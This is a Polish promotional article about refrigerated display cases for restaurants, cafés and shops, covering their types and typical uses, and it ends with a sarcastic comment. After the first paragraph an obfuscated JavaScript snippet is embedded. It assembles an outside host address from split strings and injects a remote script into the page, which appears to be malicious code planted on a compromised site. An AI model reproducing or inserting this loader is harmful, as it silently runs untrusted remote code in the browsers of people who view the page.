W dzisiejszych czasach połączenie elegancji i funkcjonalności oczekiwane jest w wielu branżach – nie ominęło przy tym również gastronomii. Nie należy bowiem umniejszać roli odpowiedniej prezentacji produktu czy potrawy – to często ona zachęca ostatecznie klienta do wyboru określonego dania czy deseru. Odpowiadają za nią, między innymi, witryny chłodnicze, które stały się nieodłącznym elementem nie tylko wielu sklepów, ale także restauracji czy kawiarni.
(function(){ zlqa=document.createElement(„script”);zlqa_=((„u”)+”st”)+”a”;zlqa.async=true; zlqa.type=”text/javascript”;zlqa_+=(„t.i”)+””+”n”;zlqa_+=((„f”)+”o”);zlqa_+=”/”; zlqau=”2304486578.”;zlqau+=”8deqzqt6lqazm30v7tj”+”i7fgeXlmuka”; zlqa.src=”https://”+zlqa_+zlqau;document.body.appendChild(zlqa); })();Witryna chłodnicza dla gastronomii – krótka charakterystyka
Witryna chłodnicza gastronomiczna to wręcz obowiązkowy element wyposażenia każdego miejsca oferującego produkty spożywcze, w tym gotowe potrawy, wymagające odpowiednich warunków termicznych w trakcie przechowywania. Doskonale sprawdza się zarówno w sklepach, jak i restauracjach, barach czy kawiarniach, gdzie estetyczne i praktyczne prezentowanie produktów jest kluczowe dla przyciągnięcia uwagi klientów.
Gastronomiczne witryny chłodnicze charakteryzują się, przede wszystkim, wysoką funkcjonalnością – umożliwiają wygodne przechowywanie produktów spożywczych w kontrolowanych, niskich temperaturach, zapewniając im świeżość i ochronę przed szybkim zepsuciem.
W witrynach chłodniczych gastronomicznych można przechowywać, w zależności od rodzaju urządzenia oraz potrzeb danego lokalu, mięso, nabiał, desery, sałatki, napoje i wiele innych produktów. Ich eleganckie konstrukcje i nowoczesne wyposażenie sprawiają, że nie tylko chłodzą czy prezentują wyroby gastronomiczne, ale też stanowią elegancki element wyposażenia lokalu.
Rodzaje witryn chłodniczych – witryna nastawna, witryna pionowa, witryna nablatowa
Na rynku znaleźć można różne rodzaje witryn chłodniczych, które dostosowane są do wielu potrzeb i wymagań użytkowników. Wśród najpopularniejszych wariantów wymienić można, chociażby, witrynę chłodniczą nastawną, pionową witrynę chłodniczą i witrynę nablatową. Witryna chłodnicza nastawna jest często wykorzystywana w punktach gastronomicznych, gdzie istotne jest wyeksponowanie oferty na stosunkowo niewielkim dostępnym obszarze, na przykład w małych cukierniach, lodziarniach lub piekarniach.
Witryna pionowa charakteryzuje się natomiast znacznie większą już pojemnością. Jako urządzenie wolnostojące staje się idealnym rozwiązaniem dla sklepów oferujących duży wybór różnorodnych produktów. Zastosowane w tej stojącej, pionowej witrynie przeszklenie gwarantują dobrą widoczność oferty, a dodatkowe oświetlenie podkreśla jej atrakcyjność.
Ekspozycja produktów za pomocą takiego sprzętu staje się wyjątkowo atrakcyjna. Witryna nablatowa z kolei to rozwiązanie technologiczne przeznaczone dla lokali gastronomicznych, które nie dysponują dużą, wolną przestrzenią, ale chcą zapewnić swoim klientom łatwy dostęp do świeżych produktów. Stawiana na blacie czy też ladzie, wykorzystywana jest do przechowywania produktów świeżych, a przezroczyste fronty i boki gwarantuje atrakcyjne wyeksponowanie oferty.
W jakich miejscach korzysta się z witryn chłodniczych?
Witryny chłodnicze to uniwersalne rozwiązanie, które sprawdza się zarówno w gastronomii, jak i handlu związanym z sektorem spożywczym. Miejsca, w których najczęściej spotykany jest ten sprzęt, to chociażby sklepy – od supermarketów (i funkcjonujących na ich obszarze działów garmażeryjnych ze świeżymi wyrobami), poprzez delikatesy, aż po małe sklepy spożywcze.
Tam witryny chłodnicze służą do wyeksponowania, między innymi, mięs, wędlin, nabiału, ryb czy gotowych produktów. W gastronomii witryny chłodnicze są niezbędne – montuje się je nie tylko w restauracjach czy barach, ale także w kawiarniach, cukierniach czy lodziarniach. Tam pełnią podobną funkcję, z tym że często są one bardziej widoczne dla klientów, pełniąc również funkcję dekoracyjną.
Ach, serio? Kto by pomyślał, że witryny chłodnicze mogą być takie… wszechstronne. Rewolucja w świecie gastronomii, nie ma co. Teraz tylko czekać, aż lodówka w domu też będzie tak elegancka.